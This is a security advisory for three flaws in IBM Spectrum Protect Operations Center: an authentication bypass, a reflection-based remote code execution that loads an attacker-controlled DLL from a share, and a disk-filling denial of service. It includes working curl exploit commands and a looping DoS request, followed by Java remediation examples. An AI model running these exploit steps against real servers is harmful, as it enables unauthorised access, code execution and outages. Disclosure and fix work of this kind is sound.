CVE-2020-4954: Authentication Bypass
CVSSv3 Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N)
CVSSv3 Base Score: 6.5
After installation, the Operations Center must be configured through its web UI with a Spectrum Protect server that acts as its hub server. During configuration, the hub server's IP:port and administrative credentials are used to access the hub server. Once the Operations Center is associated with a hub server, a user can log in to the Operations Center with the administrative credentials stored on the hub server.
An unauthenticated remote attacker can still log in to an Operations Center that already has a hub server configured, via the URL endpoint /oc/configuration. The attacker sets up his/her own Spectrum Protect server and supplies its IP:port and credentials in the configuration page. This gives the attacker an authenticated session with the Operations Center.
After logging in, the attacker apparently cannot perform operations that require access to the configured hub server, because the login session carries the attacker's credentials, which do not match those configured for the hub server. However, s/he can perform other authenticated operations that do not require hub server access. For example, the attacker can enable logging for various components in OpsCntrLog.config and view the log contents by making RPC calls to com.ibm.tsm.gui.rpc.handlers.DebugRPC.
The following steps are used to get an authenticated session with the Operations Center:
a) Fetch a login JSESSIONID and xtoken (for XSRF protection)
curl -kis --tlsv1.2 'https://<spoc_host>:11090/oc/configuration' | egrep 'JSESSIONID|xtoken'
Set-Cookie: JSESSIONID=0000HTCQksYD8Jr60DyZAj15mXa:50e18252-bcbc-4523-aa0b-79391fe7cec3; Path=/oc; Secure; HttpOnly
<input type="hidden" name="xtoken" id="xtoken" value=EEEEFFED-645A-4514-955C-C336EF236403></input>
b) Log in to the Operations Center using credentials on an attacker-controlled Spectrum Protect server; 302 = success
curl -kis --tlsv1.2 --cookie 'JSESSIONID=0000HTCQksYD8Jr60DyZAj15mXa:50e18252-bcbc-4523-aa0b-79391fe7cec3' -H 'Host: <spoc_host>:11090' -H 'Origin: https://<spoc_host>:11090' -d 'connectto=<attacker_controlled_server>%3A1500&login=<attacker_login>&password=<attacker_passwd>&useSSL=true&useTLS12Only=true&tzoffset=300&nextURL=&xtoken=EEEEFFED-645A-4514-955C-C336EF236403' -D - -o /dev/null 'https://<spoc_host>:11090/oc/configuration'
HTTP/1.1 302 Found
X-FRAME-OPTIONS: SAMEORIGIN
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval'; connect-src wss: https:; img-src 'self' data: *; font-src 'self' data:; report-uri csp-report
Strict-Transport-Security: max-age=31536000; includeSubDomains
Location: https://<spoc_host>:11090/oc/gui#configure
CVE-2020-4955: QueryReadStoreCache Authenticated RCE
CVSSv3 Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
CVSSv3 Base Score: 8.8
An authenticated remote attacker can send a specially crafted HTTP POST request to /oc/QueryReadStoreCache/ to load an attacker-controlled library file (e.g., a DLL) into the Operations Center process, leading to remote code execution.
The following snippet shows the vulnerable code:
protected void handlePost(final HttpServletRequest req, final HttpServletResponse resp) throws ServletException, IOException {
    QueryReadStoreCache.log.logInfo("Url " + req.getRequestURI());
    // Split the request path: /oc/QueryReadStoreCache/<class>/<method>
    final String[] url = req.getRequestURI().split("/");
    if (url.length < 5) {
        throw new IllegalStateException("The service requires at least 4 paths within the url");
    }
    try {
        final Map params = req.getParameterMap();
        final String serverName = req.getParameter("server");
        // Class name and method name are taken straight from the attacker-controlled URL ...
        final Class<?> classInstance = Class.forName(url[3]);
        final Method method = classInstance.getMethod(url[4], (Class<?>[])QueryReadStoreCache.CLASS_ARGUMENT);
        // ... and the resolved static method is invoked with the 'server' parameter as its only argument.
        final JSONArray list = JSONUtils.getFirstItemsArray(((JSONString)method.invoke(null, serverName)).toString());
        [...]
The POST handler extracts a Java class name (url[3]) and a method name for that class (url[4]) from the URL and invokes the method via reflection. The method must be a static method that takes a single parameter, which is supplied by the 'server' URL parameter. If the attacker sends a POST request to the URL /oc/QueryReadStoreCache/java.lang.System/load with the 'server' parameter set to '\\\some_share\evil.dll', the attacker-controlled DLL is loaded into the Operations Center process, leading to RCE.
When combined with vulnerability 1) (CVE-2020-4954), the attacker achieves unauthenticated RCE in the security context of the account running the Operations Center (i.e., the SYSTEM account on Windows).
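The root cause is that the caller names the class and method. One way to close this is to stop resolving anything from the URL and dispatch only through a fixed table of permitted operations, validating the single user-supplied argument before it reaches the handler. The following is an added example written for this advisory, not Operations Center code: it models the request as a URI string plus the 'server' parameter (rather than an HttpServletRequest) so it runs with plain javac/java, and the com.example.oc.ServerStore handlers, the server-name pattern and the error statuses are assumptions made for illustration.

```java
import java.util.LinkedHashMap;
import java.util.Map;
import java.util.function.Function;
import java.util.regex.Pattern;

/**
 * Added example (not Operations Center code): an allowlisted dispatcher that
 * replaces the reflective Class.forName(url[3]).getMethod(url[4]) lookup.
 * The request is modelled as (requestUri, serverParam) so the class runs
 * stand-alone; in a servlet both values would come from HttpServletRequest.
 * The com.example.oc.ServerStore handlers are hypothetical stand-ins.
 */
public final class SafeQueryReadStoreDispatcher {

    /** The only operations this endpoint may invoke, keyed by "<class>/<method>". */
    private static final Map<String, Function<String, String>> ALLOWED = new LinkedHashMap<>();
    static {
        ALLOWED.put("com.example.oc.ServerStore/listNodes",
                server -> "[{\"server\":\"" + server + "\",\"nodes\":[]}]");
        ALLOWED.put("com.example.oc.ServerStore/listPolicies",
                server -> "[{\"server\":\"" + server + "\",\"policies\":[]}]");
    }

    /** Server names are plain identifiers; paths, UNC shares and the like never match. */
    private static final Pattern SERVER_NAME = Pattern.compile("[A-Za-z0-9_.-]{1,64}");

    /** Outcome of a dispatch: an HTTP-style status plus a body. */
    public static final class Result {
        public final int status;
        public final String body;
        Result(int status, String body) { this.status = status; this.body = body; }
        @Override public String toString() { return status + " " + body; }
    }

    public static Result handlePost(String requestUri, String serverParam) {
        // Same shape check as the original handler: /oc/QueryReadStoreCache/<class>/<method>
        String[] url = requestUri.split("/");
        if (url.length < 5) {
            return new Result(400, "The service requires at least 4 paths within the url");
        }
        String key = url[3] + "/" + url[4];

        // Look the pair up in a fixed table; nothing is resolved by reflection.
        Function<String, String> handler = ALLOWED.get(key);
        if (handler == null) {
            // Worth audit-logging: repeated hits here indicate probing of the endpoint.
            System.err.println("rejected QueryReadStoreCache target: " + key);
            return new Result(403, "unknown query target");
        }

        // Validate the only user-controlled argument before the handler sees it.
        if (serverParam == null || !SERVER_NAME.matcher(serverParam).matches()) {
            return new Result(400, "invalid server name");
        }
        return new Result(200, handler.apply(serverParam));
    }

    public static void main(String[] args) {
        // A legitimate query against an allowlisted handler.
        System.out.println(handlePost("/oc/QueryReadStoreCache/com.example.oc.ServerStore/listNodes", "HUB1"));
        // The class/method pair from the advisory is refused without ever being looked up.
        System.out.println(handlePost("/oc/QueryReadStoreCache/java.lang.System/load", "\\\\some_share\\evil.dll"));
        // An allowed method with a malformed argument is also refused.
        System.out.println(handlePost("/oc/QueryReadStoreCache/com.example.oc.ServerStore/listNodes", "../x"));
    }
}
```

Compile with javac and run the class: the first call returns 200 with the handler's JSON, the java.lang.System/load pair returns 403, and the malformed server name returns 400. The pattern generalises to any reflective dispatcher: the client never names a class or method, it only selects a key that the server mapped in advance.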
CVE-2020-4956: DebugRPC Authenticated Remote DoS
CVSSv3 Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H)
CVSSv3 Base Score: 7.1
An authenticated attacker can issue a 'setCacheValue' RPC call to store a large value in the Operations Center cache and then repeatedly issue a 'dumpCache' RPC call to create a large number of large cache dump files on the Operations Center host. This can fill up the file system where the cache dump files reside, leading to DoS.
When combined with vulnerability 1) (CVE-2020-4954), the attacker achieves unauthenticated remote DoS.
Here are the steps to create the cache dump files:
a) From vulnerability 1), an authenticated JSESSIONID and an xtoken are obtained.
b) With an authenticated JSESSIONID for the Operations Center, we can create a large CacheValue in the SPOC cache:
echo -en '{"clazz":"com.ibm.evo.rpc.RPCRequest","methodClazz":"com.ibm.tsm.gui.rpc.handlers.DebugRPC","methodName":"setCacheValue","methodArgs":["KEY1","'$(python3 -c "print('A'*10000000)")'"]}' > /tmp/cacheValue1
curl -kis --tlsv1.2 --cookie 'JSESSIONID=0000HTCQksYD8Jr60DyZAj15mXa:50e18252-bcbc-4523-aa0b-79391fe7cec3' -H 'Host: <spoc_host>:11090' -H 'Origin: https://<spoc_host>:11090' -H 'xtoken: EEEEFFED-645A-4514-955C-C336EF236403' -H 'Content-Type: application/json-rpc' -d @/tmp/cacheValue1 --compress 'https://<spoc_host>:11090/oc/RPCAdapter'
c) Repeatedly dump the cache:
while true; do curl -kis --tlsv1.2 --cookie 'JSESSIONID=0000HTCQksYD8Jr60DyZAj15mXa:50e18252-bcbc-4523-aa0b-79391fe7cec3' -H 'Host: <spoc_host>:11090' -H 'Origin: https://<spoc_host>:11090' -H 'xtoken: EEEEFFED-645A-4514-955C-C336EF236403' -H 'Content-Type: application/json-rpc' -d '{"clazz":"com.ibm.evo.rpc.RPCRequest","methodClazz":"com.ibm.tsm.gui.rpc.handlers.DebugRPC","methodName":"dumpCache","methodArgs":[]}' --compress 'https://<spoc_host>:11090/oc/RPCAdapter'; done
For each dump, a different dump file is created in a temp folder. The attacker controls the size of each dump file by creating one or more CacheValues of his/her chosen size. This can fill up the file system, leading to DoS.
C:\Windows\System32\config\systemprofile\AppData\Local\Temp>dir | more
Volume in drive C has no label.
Volume Serial Number is 1A68-87EC
Directory of C:\Windows\System32\config\systemprofile\AppData\Local\Temp
11/13/2020 12:18 AM <DIR> .
11/13/2020 12:18 AM <DIR> ..
11/13/2020 12:14 AM 10,107,457 cachedump1005002470733379056.txt
11/13/2020 12:14 AM 10,107,457 cachedump1005272695032173425.txt
11/13/2020 12:15 AM 10,107,457 cachedump1011400486671420073.txt
11/13/2020 12:12 AM 10,107,457 cachedump101157961566663795.txt
[...]
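Two bounds remove the DoS regardless of how many dump requests arrive: cap the size of a value accepted by setCacheValue, and cap the number of dump files that may exist at once by evicting the oldest before writing a new one. The following is an added example written for this advisory, not Operations Center code; the cache representation, the limits, the dump directory and the cachedump*.txt naming (chosen to match the listing above) are assumptions made for illustration.

```java
import java.io.BufferedWriter;
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.nio.file.DirectoryStream;
import java.nio.file.Files;
import java.nio.file.Path;
import java.util.ArrayList;
import java.util.Comparator;
import java.util.LinkedHashMap;
import java.util.List;
import java.util.Map;

/**
 * Added example (not Operations Center code): a cache whose setCacheValue and
 * dumpCache counterparts are bounded, so that a client repeating dumpCache
 * cannot grow disk usage without limit. Limits and file layout are assumed.
 */
public final class BoundedCacheDumper {
    private final Path dumpDir;
    private final int maxDumpFiles;
    private final long maxValueBytes;
    private final Map<String, String> cache = new LinkedHashMap<>();

    public BoundedCacheDumper(Path dumpDir, int maxDumpFiles, long maxValueBytes) {
        this.dumpDir = dumpDir;
        this.maxDumpFiles = maxDumpFiles;
        this.maxValueBytes = maxValueBytes;
    }

    /** Counterpart of setCacheValue: oversized values are refused before being stored. */
    public boolean setCacheValue(String key, String value) {
        if (value == null || value.getBytes(StandardCharsets.UTF_8).length > maxValueBytes) {
            return false;
        }
        cache.put(key, value);
        return true;
    }

    /** Counterpart of dumpCache: evicts the oldest dumps so at most maxDumpFiles ever exist. */
    public Path dumpCache() throws IOException {
        List<Path> existing = listDumps();
        existing.sort(Comparator.comparingLong(BoundedCacheDumper::lastModifiedMillis));
        while (existing.size() >= maxDumpFiles) {
            Files.deleteIfExists(existing.remove(0));   // oldest first
        }
        Path out = Files.createTempFile(dumpDir, "cachedump", ".txt");
        try (BufferedWriter w = Files.newBufferedWriter(out, StandardCharsets.UTF_8)) {
            for (Map.Entry<String, String> e : cache.entrySet()) {
                w.write(e.getKey() + "=" + e.getValue());
                w.newLine();
            }
        }
        return out;
    }

    /** All dump files currently in the directory. */
    public List<Path> listDumps() throws IOException {
        List<Path> dumps = new ArrayList<>();
        try (DirectoryStream<Path> ds = Files.newDirectoryStream(dumpDir, "cachedump*.txt")) {
            for (Path p : ds) {
                dumps.add(p);
            }
        }
        return dumps;
    }

    private static long lastModifiedMillis(Path p) {
        try {
            return Files.getLastModifiedTime(p).toMillis();
        } catch (IOException e) {
            return Long.MAX_VALUE;   // unreadable entries are treated as newest and kept
        }
    }

    public static void main(String[] args) throws IOException {
        Path tmp = Files.createTempDirectory("oc-dumps");
        BoundedCacheDumper d = new BoundedCacheDumper(tmp, 3, 1024);
        // A 10 MB value like the one in the advisory is rejected outright.
        System.out.println("10 MB value accepted? " + d.setCacheValue("KEY1", "A".repeat(10_000_000)));
        d.setCacheValue("KEY2", "small value");
        // Twenty dump requests leave at most three files behind.
        for (int i = 0; i < 20; i++) {
            d.dumpCache();
        }
        System.out.println("dump files on disk: " + d.listDumps().size());
    }
}
```

Requires Java 11 or later for String.repeat. Running main prints that the 10 MB value was not accepted and that three dump files remain after twenty dump calls; the directory never grows past maxDumpFiles, and each file is at most the sum of the bounded values, so total disk usage is bounded by maxDumpFiles times the cache size.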